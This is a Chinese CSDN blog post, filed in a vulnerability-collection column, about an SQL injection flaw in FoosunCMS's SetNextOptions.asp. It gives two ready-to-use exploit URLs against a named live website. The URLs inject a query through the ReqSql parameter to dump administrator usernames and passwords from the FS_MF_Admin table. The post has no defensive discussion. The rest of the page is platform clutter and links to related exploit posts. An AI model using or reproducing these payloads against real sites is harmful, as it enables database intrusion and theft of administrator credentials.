风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用

最新推荐文章于 2023-08-13 16:38:51 发布
最新推荐文章于 2023-08-13 16:38:51 发布
阅读量718 收藏
点赞数
分类专栏: 漏洞收集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6587021
版权

风讯foosun的注册文件存在漏洞。
可以暴管理员帐号和密码。
漏洞文件:http://www.dj4now.com/user/SetNextOptions.asp 
利用简单的方法:
暴管理员帐号:
复制代码http://www.dj4now.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1 ,admin_name,3,4,5,6,7,8

++from+FS_MF_Admin

暴管理员密码:
复制代码http://www.dj4now.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8

++from+FS_MF_Admin

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
风讯CMS4.0sp5 商业版的致命伤
HackCode的专栏
07-26 718
 文章作者:oldjun&flyh4t[ 脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注意:文章已经发表在《黑客手册》后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明出处  FooSunCMS(风讯网站管理系统)是由四川风讯科技发展有限公司自主编写的一套ASP+ACCESS/MSSQL的内容管理系统程序,FoosunCMS已形成内容管理系统整站解
asp下的风讯用的SQL通用防注入模块提供了
10-30
ASP文件通常以`.asp`为扩展名,并能在支持ASP的Web服务器上执行。 ### 二、SQL注入攻击简介 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过恶意构造SQL语句,使这些语句被数据库引擎执行,从而获取敏感数据...
一次模拟从外网到内网漫游的实验过程
渗透测试研究中心
01-24 104
1.访问目标系统的WEB端口,然后通过在线指纹识别查询目标系统的CMS系统为FoosunCMS,该网站存在历史漏洞后台注入漏洞,且版本为v2.02.访问以下地址,可获得管理员的UserNumber3。直接访问后台页面4.直接用sql注入拿到UserNumber,然后再与UserName等拼接,构造cookie直接以管理员权限登录,Exp代码如下:try:#写入cookie中if index!= -1:else:try:执行后成功得到加密的cookie。
基于ASP的FoosunCMS 风讯内容管理系统 5.0.20220507.zip
07-10
"基于ASP的FoosunCMS 风讯内容管理系统 5.0.20220507.zip" 是该系统的特定版本,发布于2022年5月7日,版本号为5.0。 ASP是一种由微软开发的服务器端脚本环境,允许开发者在IIS(Internet Information Services)...
ASP实例开发源码-FoosunCMS 风讯内容管理系统 5.0.20100507.zip
11-15
ASP实例开发源码—FoosunCMS 风讯内容管理系统 5.0.20100507.zip ASP实例开发源码—FoosunCMS 风讯内容管理系统 5.0.20100507.zip ASP实例开发源码—FoosunCMS 风讯内容管理系统 5.0.20100507.zip
ASP网站实例开发源码——风讯FoosunCMS带DIV模板海特论坛特供精简版(源码+数据库).rar
10-19
ASP网站实例开发源码——风讯FoosunCMS带DIV模板海特论坛特供精简版】是一款基于ASP技术的网站内容管理系统(CMS),它提供了丰富的功能和易用的界面,适合初学者和有一定经验的开发者进行快速建站。这款源码包括...
ASP网站实例开发源码——风讯FoosunCMS带DIV模板海特论坛特供精简版(源码+数据库).zip
10-19
ASP网站实例开发源码——风讯FoosunCMS带DIV模板海特论坛特供精简版】是一款基于ASP技术的网站内容管理系统(CMS),专为海特论坛设计的简化版。这款源码包含了完整的网站构建框架,适用于快速搭建新闻资讯类网站...
风讯网站内容管理系统(FoosunCMS) v3.2 Sp1
10-12
功能介绍: 全新操作界面 无限分类 生成目录自由保存到指定的目录 全静态生成 全个性化模板生成,模板由用户自由定义 支持二级域名管理 栏目自定义生成文件名规则 栏目可以排序,
风讯CMS常见问题锦集
09-28
关键字描述:常见问题 &rdquo &ldquo 系统 是否 文件 如果 提示 权限风讯CMS系统在使用的时候可能出现各种情况,根据详细的提示信息,分别找到解决的办法,目前遇到的可能不全面,只是把常见的列出来,以供大家参考。 1.出现提示网页无法显示,500错误的时候,又没
asp.net简单防范sql注入漏洞
10-24
asp.net简单防范sql注入漏洞 防止 sql注入攻击 1 限制 文本框的最大长度 2 删除用户的单引号 3 处理sql注入的另外一个方法是 使用ado.net command对象的参数集合。 而不是评接多个字符串
ASPCMS DEDE 文章导入 Pbootcms
04-22
aspcms dede 文章导出pbcms
FoosunCms getshell
weixin_34223655的博客
12-02 190
在文件\User\award\awardAction.asp中:code 区域Integral=NoSqlHack(request.QueryString("Integral"))if action="join" then User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID)...
代码审计-ASP.NET项目-未授权访问漏洞
最新发布
xiaoheizi的博客
08-13 2052
Inherits msdn解释:定义提供给页继承的代码隐藏类。 它可以是从 Page 类派生的任何类。 此特性与 CodeFile 特性一起使用,后者包含指向代码隐藏类的源文件的路径。 Inherits 特性在使用 C# 作为页面语言时区分大小写,而在使用 Visual Basic 作为页面语言时不区分大小写。
ASP.net 资源请求漏洞利用工具PadBuster
weixin_34223655的博客
07-26 317
2019独角兽企业重金招聘Python工程师标准>>> ...
ASP.NET常见漏洞
www.i201314.net
07-16 5322
未隐藏错误讯息  开发人员常会将方便排错,但正式上线时却忘了移除,导致一旦程序出错,相关程序代码细节甚至程序片段就赤裸裸地展示出来。黑客可能由其中找到相关的文件位置、数据库信息、组件版本... 等信息,提供入侵的指引。关闭Request Validation  依Hunt的统计,近30%的网站豪迈地关闭了全站的Request验证。若真有需要,针对页面关闭就好,至少伤害面变小,但如果心有余力,避
FoosunCMS Sql Injection Vulnerability
广外女生官方BLOG
09-11 502
#漏洞原因: 变量username未经过滤传值,带入sql执行,导致注入产生。 #关键代码: If CheckPost() Then Select Case Act Case "checkname" 触发注入 Checkname() CheckPost()函数原型在行73-96,username由此获取值,代码如下: XmlDoc.documentElement.selectSingleNode(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值